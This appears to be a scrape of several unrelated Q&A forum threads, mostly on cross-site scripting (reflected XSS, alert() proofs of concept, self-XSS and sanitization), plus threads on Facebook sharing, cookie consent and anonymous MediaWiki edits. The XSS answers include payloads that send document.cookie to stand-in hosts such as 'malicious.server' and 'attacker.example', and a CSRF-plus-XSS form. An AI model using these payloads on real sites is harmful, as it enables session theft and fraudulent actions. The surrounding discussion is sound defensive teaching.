I am researching XSS and trying to understand its different types.
Most documents describe what they are and explain with a simple example. I have understood stored XSS quite well.
What I don't understand is reflected XSS and how it is done in a real-world scenario. Most explanations just talk about injecting malicious code which gets embedded in the page a user visits by clicking a malicious link. But I don't understand how and why they would click such a link in the first place.
If any of you can share a real-world example of reflected XSS, it would really be helpful.
"Hi midhun lc,
I created the salary report you asked for, find it [here].
Regards,
Your assistant"
[here] is a link that points to https://payrollapplication/?reportid=<script>$.post('https://payrollapplication/send_payment?amount=5000&to=assistant')</script> (Obviously this also exploits CSRF.)
Or [here] is a link that points to https://payrollapplication/?reportid=<script>$.post('https://malicious.server/?receive=' + document.cookie)</script> to steal session and other cookies. (This also exploits weak cookie flags.)
Or it can just send any data from the payrollapplication that the victim can access.
And so on. How exactly the payload gets to the victim may vary of course. It can be in an internal doc, sent in an email, etc.
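To make the mechanics concrete, here is a minimal sketch of what the vulnerable report page might look like. This is not the real application; it assumes a hypothetical Node.js/Express backend, and the route and parameter names are made up:

// Hypothetical vulnerable endpoint (illustration only).
const express = require('express');
const app = express();

app.get('/', (req, res) => {
  const reportId = req.query.reportid || '';
  // Vulnerable: the query parameter is reflected into the HTML unescaped,
  // so a <script> payload embedded in the link runs in the victim's browser
  // with the victim's session.
  res.send(`<h1>Report ${reportId}</h1>`);
});

app.listen(3000);

The script arrives in the URL and is echoed straight back, so it only runs when the victim opens the attacker's link, which is why the social-engineering step (the email above) is part of the attack. The fix is to encode or validate reportid before it is placed into the page.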
I was wondering why alert() is quite often used to demonstrate XSS vulnerabilities. If I am not mistaken, XSS means that the attacker should be able to establish two-way communication between the infected client and the attacker's server. Is it just that this is a quite visual way to demonstrate that the attack is possible (as it uses the same characters as the actual payload would have), or is there something more? I tried to look it up online but found nothing...
You're overthinking it. It's demonstrated with an alert because when the alert is shown, it means the attacker was able to insert JavaScript code into your page and that code was executed as if you had put it there yourself... so from the perspective of the client (visitor) this code is coming from you, and they don't know anything about the attacker - which is what the attacker wants.
It's just like a "hello world" program, but from the XSS world. It's easy to check and minimalistic, confirming that you can at least execute some JavaScript function (alert). While you're looking for an XSS, the payload itself is not as important as the "can I actually inject some JavaScript here?" question.
Basically, it's a two-step approach:
Find a vulnerable parameter (using alert or any other simple function).
Then have some fun with it.
If I am not mistaken XSS means that the attacker should be able to establish two-way communication between infected client and attacker's server.
Not always. Sometimes, one-way communication is enough:
Just send data to your server, no response required. It's very useful in the stored XSS case (when, say, you can put arbitrary JavaScript code into a comment visible to other users); a minimal sketch follows at the end of this answer.
You can inject some HTML asking the user to open another website and do whatever you want. (XSS + social engineering)
To summarise: alert is a simple function sufficient to check whether you can inject JavaScript, like a "hello world" to check that your setup is working. If you're successful, it's time to make it more complicated.
Edit: In a real attack, people usually try more options, because the "alert" keyword is blocked by most security filters. It doesn't mean that the XSS is not there ;) But "alert" is a very convenient example for tutorials, so you'll see it everywhere.
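To illustrate the one-way case from the list above: a payload needs no response channel at all. Something along these lines is enough (the attacker's domain here is made up):

// One-way exfiltration: silently ship the victim's cookies to the attacker.
// No response from the attacker's server is needed.
new Image().src = 'https://attacker.example/collect?c=' + encodeURIComponent(document.cookie);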
I was wondering why alert() is quite often used to demonstrate XSS vulnerabilities.
Simply because the alert() method is the simplest way to show people that you are able to insert JS code into the page.
If I am not mistaken XSS means that the attacker should be able to establish two-way communication between infected client and attacker's server.
Kinda. XSS just means that the attacker is able to inject malicious JS into the page.
It is just that this is a quite visual way to demonstrate that the attack is possible (as it uses the same characters as the actual payload would have) or is there something more?
It's just the visual way.
However, JS can be sandboxed in iframes etc., so alert('XSS') is not the best way to show that you are able to inject malicious code.
The best way is to use some information from the page itself. For example,
alert(`XSS attack on ${window.location.host}'s page: "${document.title}"`)
is a much better way to demonstrate it. It shows that you have access to window properties (redirect) and the document (modify) as well.
On this page it would display:
XSS attack on stackoverflow.com's page: "XSS, why is alert(XSS) used to find/demonstrate xss vulnerabilities? - Stack Overflow"
First post on StackOverflow, so please forgive any protocol lapses!
I've found similar problems to the one below elsewhere on SO, but none that's an exact match, nor a solution that hits the spot.
I have a client site with FB Share and Like buttons, all of which work perfectly on straightforward named pages. In the case of the shop and blog pages I need to use a querystring, which works perfectly on other sites, but not this one! I've run the FB Debugger on the affected pages and all looks hunky dory.
Here are two example pages with the problem:
http://www.fabniki.com/productdetail?pid=251 and http://www.fabniki.com/blogdetail?id=327&p=1.
In the case of the shop item, the text Facebook is showing isn't even on the page. I've tried clearing cache, forcing an FB cache refresh etc.
My own site uses a similar querystring system for my blog, and this works absolutely fine with Facebook shares and likes.
I'd be very grateful for any suggestions!
OK, the problem was - unsurprisingly - entirely of my own making. I'd allowed myself to get bogged down in the debugger, which looks at the exact URL you paste into its input field. If you're sufficiently idiotic, it may not occur to you to check if this is the actual value being passed to FB by your Like and Share buttons. Doh!
Thanks to some excellent support from FB developers, the problem was spotted and corrected with only minor dents to my ego.
I wanted to answer my own question, a) to avoid wasting people's time and b) to give Facebook Support a bit of appreciation for a change!
Struggling to find information on this...
Do you have to have, e.g., a pop-up/information bar that shows the cookie message and then has an opt-in button? Or can you simply have a link in the footer that points to cookie and data information, etc.?
Some people only do the latter, and if that's allowed it makes no sense to do anything else...
Implied consent is absolutely fine, unless you're dealing with sensitive data, which means you just have to display information regarding your cookie use but the user doesn't have to actually click on anything to accept it before they can carry on. The UK Information Commissioner's Office has some really good information: https://ico.org.uk/for-organisations/guide-to-pecr/cookies. I'm not sure where you're based but the law is Europe-wide so the advice would be the same regardless.
The UK government site uses implied consent so if they're doing it you can assume you'll be ok.
As for those sites with explicit consent, I remember when the ruling was first made and there was an assumption that explicit consent was required so it is likely just sites which implemented the rules very early. To be honest, I can't remember visiting any site which required me to agree to cookie use before continuing, buttons are usually just there to get rid of the annoying messages.
Simply having a link in the footer is not sufficient in my opinion, as the ICO says:
This remains the case if information is provided to the user but only as part of a privacy notice that is hard to find, difficult to understand or rarely read
If I have fields that will only ever be displayed to the user that enters them, is there any reason to sanitize them against cross-site scripting?
Edit: So the consensus is clear: it should be sanitized. What I'm trying to understand is why. If the only user who can ever view the script they insert into the site is the user himself, then the only thing he can do is execute the script himself, which he could already do without my site being involved. What's the threat vector here?
Theoretically: no. If you are sure that only they will ever see this page, then let them script whatever they want.
The problem is that there are a lot of ways in which they can make other people view that page, ways you do not control. They might even open the page on a coworker's computer and have them look at it. It is undeniably an extra attack vector.
Example: a pastebin without persistent storage; you post, you get the result, that's it. A script can be inserted that inconspicuously adds a "donate" button linking to your PayPal account. Put it up on enough people's computers, hope someone donates, ...
I agree that this is not the most shocking and realistic of examples. However, once you have to defend a security-related decision with "that is possible but it does not sound too bad," you know you crossed a certain line.
Otherwise, I do not agree with answers like "never trust user input." That statement is meaningless without context. The point is how to define user input, which was the entire question. Trust how? Semantically? Syntactically? To what level? Just size? Proper HTML? A subset of Unicode characters? The answer depends on the situation. A bare webserver "does not trust user input" but plenty of sites get hacked today, because the boundaries of "user input" depend on your perspective.
Bottom line: avoid allowing anybody any influence over your product unless it is clear to a sleepy, non-technical consumer what that influence is and who has it.
That rules out almost all JS and HTML from the get-go.
P.S.: In my opinion, the OP deserves credit for asking this question in the first place. "Do not trust your users" is not the golden rule of software development. It is a bad rule of thumb because it is too destructive; it detracts from the subtleties in defining the frontier of acceptable interaction between your product and the outside world. It sounds like the end of a brainstorm, while it should start one.
At its core, software development is about creating a clear interface to and from your application. Everything within that interface is Implementation, everything outside it is Security. Making a program do the things you want it to is so preoccupying one easily forgets about making it not do anything else.
Picture the application you are trying to build as a beautiful picture or photo. With software, you try to approximate that image. You use a spec as a sketch, so already here, the more sloppy your spec, the more blurry your sketch. The outline of your ideal application is razor thin, though! You try to recreate that image with code. Carefully you fill the outline of your sketch. At the core, this is easy. Use wide brushes: blurry sketch or not, this part clearly needs coloring. At the edges, it gets more subtle. This is when you realize your sketch is not perfect. If you go too far, your program starts doing things that you do not want it to, and some of those could be very bad.
When you see a blurry line, you can do two things: look closer at your ideal image and try to refine your sketch, or just stop coloring. If you do the latter, chances are you will not go too far. But you will also make only a rough approximation of your ideal program, at best. And you could still accidentally cross the line anyway! Simply because you are not sure where it is.
You have my blessing in looking closer at that blurry line and trying to redefine it. The closer you get to the edge, the more certain you are where it is, and the less likely you are to cross it.
Anyway, in my opinion, this question was not one of security, but one of design: what are the boundaries of your application, and how does your implementation reflect them?
If "never trust user input" is the answer, your sketch is blurry.
(and if you don't agree: what if OP works for "testxsshere.com"? boom! check-mate.)
(somebody should register testxsshere.com)
Just because you don't display a field to someone, doesn't mean that a potential Black Hat doesn't know that they're there. If you have a potential attack vector in your system, plug the hole. It's going to be really hard to explain to your employer why you didn't if it's ever exploited.
I don't believe this question has been answered entirely. He wants to see an actual XSS attack when the user can only attack himself. This is actually done by a combination of CSRF and XSS.
With CSRF you can make a user send a request containing your payload. So if a user can attack himself using XSS, you can make him attack himself (make his browser send a request that carries your XSS).
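A minimal sketch of that combination (every URL and field name here is made up, and it assumes the endpoint has no CSRF token): the attacker's page forces the victim's browser to submit the XSS payload into the victim's own "private" field, which the site later reflects back to him unescaped.

// Hypothetical script running on the attacker's page.
// CSRF step: the victim's browser, carrying the victim's session cookies,
// submits the attacker's payload into the victim's own "private" field.
const form = document.createElement('form');
form.method = 'POST';
form.action = 'https://victim.example/profile/update';   // assumed endpoint
const field = document.createElement('input');
field.type = 'hidden';
field.name = 'private_note';                              // assumed field name
// XSS step: this value executes later, when the site displays the field unescaped.
field.value = '<img src=x onerror="/* attacker JavaScript runs here */">';
form.appendChild(field);
document.body.appendChild(form);
form.submit();   // sent cross-site with the victim's cookies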
A quote from The Web Application Hacker's Handbook:
COMMON MYTH:
“We’re not worried about that low-risk XSS bug. A user could exploit it only to attack himself.”
Even apparently low-risk vulnerabilities can, under the right circumstances, pave the way for a devastating attack. Taking a defense-in-depth approach to security entails removing every known vulnerability, however insignificant it may seem. The authors have even used XSS to place file browser dialogs or ActiveX controls into the page response, helping to break out of a kiosk-mode system bound to a target web application. Always assume that an attacker will be more imaginative than you in devising ways to exploit minor bugs!
Yes, always sanitize user input:
1. Never trust user input.
2. It does not take a lot of effort to do so.
The key point being 1.
If the script, or service, that the form submits the values to is available via the internet then anyone, anywhere, can write a script that will submit values to it. So: yes, sanitize all inputs received.
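In practice, "sanitize" here usually means encoding on output rather than mangling the stored input. A minimal client-side sketch (the helper name is just illustrative):

// Replace the characters that are significant in HTML so that
// user-supplied text renders as text, not as markup.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, c => ({
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#39;'
  })[c]);
}
// Usage: element.innerHTML = escapeHtml(userInput);
// (or, simpler still, assign untrusted text to element.textContent)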
The most basic model of web-security is pretty simple:
Do not trust your users
It's also worth linking to my answer in another post: Steps to become web security savvy.
I can't believe I answered without referring to the title-question:
Is there any reason to sanitize user input to prevent them from cross site scripting themself?
You're not preventing the user from cross-site scripting themselves; you're protecting your site (or, more importantly, your client's site) from being the victim of cross-site scripting. If you don't close known security holes because you couldn't be bothered, it will become very hard to get repeat business, or good word-of-mouth advertising and recommendations from previous clients.
Think of it less as protecting your client and, if it helps, more as protecting your business.
Problem
At work we have a department wiki (running MediaWiki). Unfortunately several
people edit without logging in, and that makes it very difficult to track
down editors to ask questions about the content.
There are two strategies to improve this:
encourage logged-in editing
discourage anonymous editing.
Encouraging
For this part, any tips are welcome. But of course there are always risks involved
in rewarding behaviours.
Discourage
I know that this must be kept low or else it will discourage any editing.
But something just slightly annoying would be nice to have.
[update]
I know it is possible to just disallow anonymous editing, but that will put a high barrier to any first time contribution (especially for people outside our department!), so I do not think that is an option.
[/update]
[update2]
Using LDAP or Active Directory does not solve the problem since the wiki is also accessible and used by external contractors.
[/update2]
[update3]
I am no longer working for this company. That does not mean that I have completely lost interest in this question, but from my current point of view the most valuable part is the "Did you forget to log in?" part below, and I will accept answers based on this part of the question.
[/update3]
Confirmation
One thought was to have an additional confirmation step for anonymous users -
"Are you really sure you want to submit this anonymously?" - although with
such a question there is a risk that people will give up or resist editing. However,
if that question is re-phrased in a more diplomatic way as "Did you forget
to log in?" I think it will appear much more acceptable. And besides, that
will also capture those situations where the author did in fact forget to
log in but actually would want to have his/her contributions credited to
his/her user. This last point is by itself a good enough reason for wanting it.
Is this possible?
Delay
Another thought for something slightly annoying is to add an extra
forced delay after "save page", displaying something like "If you had logged
in you would not have to wait x seconds". Selecting the right x is difficult,
because if it is too high it will be a barrier and if it is too low it might not
make any difference. But then I started thinking: what about starting at
zero and then adding one second of delay for each anonymous edit by a given IP
address in a given time frame? That way there will be no barrier to
starting to use the wiki, and by the time the delay is getting significant
the user has already contributed a lot, so I think the outcome is much
more likely to be that the editor eventually creates a user rather than
giving up. This assumes IP addresses are rather static, but that is
typically the case on a business network.
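In pseudocode, the bookkeeping I imagine is something like this (illustrative JavaScript only, not MediaWiki code; all names are made up):

// Delay anonymous saves by one extra second per recent anonymous edit
// from the same IP address, within a sliding time window.
const WINDOW_MS = 24 * 60 * 60 * 1000;          // the "given time frame": last 24 hours
const recentAnonEdits = new Map();               // IP address -> timestamps of edits

function delaySecondsFor(ip, now = Date.now()) {
  const edits = (recentAnonEdits.get(ip) || []).filter(t => now - t < WINDOW_MS);
  edits.push(now);
  recentAnonEdits.set(ip, edits);
  return edits.length - 1;                       // first edit waits 0 s, then 1 s, 2 s, ...
}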
Is this possible?
You can turn off anonymous editing in MediaWiki like so:
Edit LocalSettings.php and add the following setting:
$wgDisableAnonEdit = true;
Edit includes/SkinTemplate.php, find $fname-edit and change the code to look like this (i.e., basically wrap the following code between the wfProfileIn() and wfProfileOut() functions):
wfProfileIn( "$fname-edit" );
global $wgDisableAnonEdit;
if ( $wgUser->mId || !$wgDisableAnonEdit ) {
// Leave this as is
}
wfProfileOut( "$fname-edit" );
Next, you may want to disable the [Edit] links on sections. To do this, open includes/Skin.php and search for editsection. You will see something like:
if (!$wgUser->getOption( 'editsection' ) ) {
Change that to:
global $wgDisableAnonEdit;
if (!$wgUser->getOption( 'editsection' ) || !$wgDisableAnonEdit ) {
Section editing is now blocked for anonymous users.
Forbid anonymous editing and let people log in using their domain logins (LDAP). Often the threshold is registering a new user and making up a username and password and such.
I think you should discourage anonymous edits by forbidding them - it's an internal wiki, after all.
The flipside is that you must make the login process as easy as possible. Hopefully you can configure the login cookie to have a decent lifetime (like one month) so they only need to log in once per month.
Play to people's egos and add a rep system, kind of like here. Just make a widget for the home page that shows the number of edits made by the top 5 users or something. Give the top 1 or 2 users an MVP reward at regular (monthly?) intervals.
Well, I doubt that this solution will be valuable for hlovdal, given that this question is now two months old, but maybe somebody else will find it useful:
The optimum solution to this problem is to enable automatic logins. This requires two steps. First, you need to add automatic authentication to your web service. Right now, we're using Apache with the Debian libapache2-authenntlm-perl package on our internal application server*. (Our network is Active Directory and, obviously, the server runs on Debian Linux.) Second, you need a MediaWiki extension that makes MediaWiki aware of the web service's authentication. I've used the Automatic REMOTE_USER Authentication module successfully on an Apache web server that was tied into our network via an NTLM authentication module, but I do recall that it required a bit of massaging the code to make it work:
I had to follow the "horrid hacks" given on the extension's page, changing the setPassword() and addUser() functions to always return true instead of always returning false.
Since Active Directory is case-insensitive and MediaWiki isn't, I replaced both instances of the statement $username = $_SERVER['REMOTE_USER'] with $username = getCanonicalName($_SERVER['REMOTE_USER']).
Since I wanted to only allow certain people within the company to use our wiki, I set autoCreate() to always return false. It doesn't sound as if you need to worry about this, so you should leave autoCreate() at always returning true, which means that anybody on your company network will be able to access the wiki.
The nifty thing about this solution is that nobody has to log in to the wiki, ever; they simply go to a wiki page and they are logged in under their network ID.
* We just switched to this from a Red Hat server that was using mod_ntlm. Unfortunately, mod_ntlm hasn't been updated in a while and it's been starting to sporadically fail. I mention this because I've started to stumble on a performance issue with our current MediaWiki configuration that may require further code massaging....
Make sure users don't get logged out if they look away from the screen or sneeze or scratch their head. You want long, persistent sessions. Once logged in, stay logged in.
That's the problem with the MediaWiki our company is using internally - you log in, do stuff, then come back later and it logged you out, but the notification of not being logged in anymore is so insignificant on the screen that the user never notices.
If this runs within an internal network, you could pull Active Directory information so that no one has to log in, ever. That's how I do it at work. That is, if they are logged into their windows machine, then my webapps can pick up their username and associate that (or their userid) with their edits.
I don't know if this would be easy to add to MediaWiki, though.
I'd recommend checking out wikipatterns.org - a great site about the social aspects of wikis
Explicitly using some form of directory service (LDAP) would probably be a good idea, so that your users are always fully identified. On the other hand, wikis are subject to their own dynamics, in fact some wikis are so successful because they can be anonymously edited, so that's another thing to keep in mind.
Apart from that, personally I'd try to create some sort of incentive for users to contribute openly and identifiably: this could be based on a point/score system so that there are stats shown for all users who have contributed to the wiki each day; this could possibly even create some sort of competition.
Likewise, the wiki could by default not show any anonymously contributed contents without them being reviewed first, which would be another incentive for users to contribute openly.
SO has an extremely low barrier for posting. You could allow people to specify their name when making an edit. When they are ready, they can finally log in to avoid having to type their name all the time.
You said this is in a departmental situation. Can't you add a feature to the wiki where it makes an educated guess as to who is editing based on the IP address, and annotates the edit accordingly?
I agree absolutely with everyone who recommends carefully researching the effects of anonymity in your application before you start "forbidding" it. In a great many cases people prefer anonymous editing because they DO NOT WANT TO BE ASKED ABOUT IT, IDENTIFIED WITH IT, OR SUFFER SOME PROBLEM FOR POINTING IT OUT. You need to be VERY sure these factors are not driving users to prefer anonymous edits, and frankly you should continue to allow anonymized edits with a generic credential login like "anonymous_employee" or "anonymous_contractor", in case someone wants to point out an issue without becoming identified with it.
Re the "thought... to have an additional confirmation step for anonymous users- "Are you really sure you want to submit this anonymously?", it's a good idea, but do not "re-phrase" in a way that suggests it is wrong to not be logged in as yourself, i.e. don't say "Did you forget to log in?" I'd instead note it this way:
"Your edit will appear as an IP number - it may be attributed to 'anonymous_employee' or 'anonymous_contractor' or 'anonymous_contributor' for your privacy protection. You will not be notified of any answer or response to it. If you prefer to have this contribution credited, then [log in right now]."
That leaves it absolutely clear what will happen, doesn't pressure anyone to do it either way, and does not bias what is being contributed with some "rewards".
You can also, alternatively, force a login via LDAP / cookies, and then ask them if they prefer this edit to be anonymous. That is the approach taken on some blog platforms. On an intranet the abuse potential for this is basically zero, so you would presumably only have situations where someone didn't want 'how they knew' or 'why they raised this' to be the question rather than the data itself... IBM has shown in some careful research that anonymized feedback is much more useful than attributed feedback in correcting groupthink and management blind spots.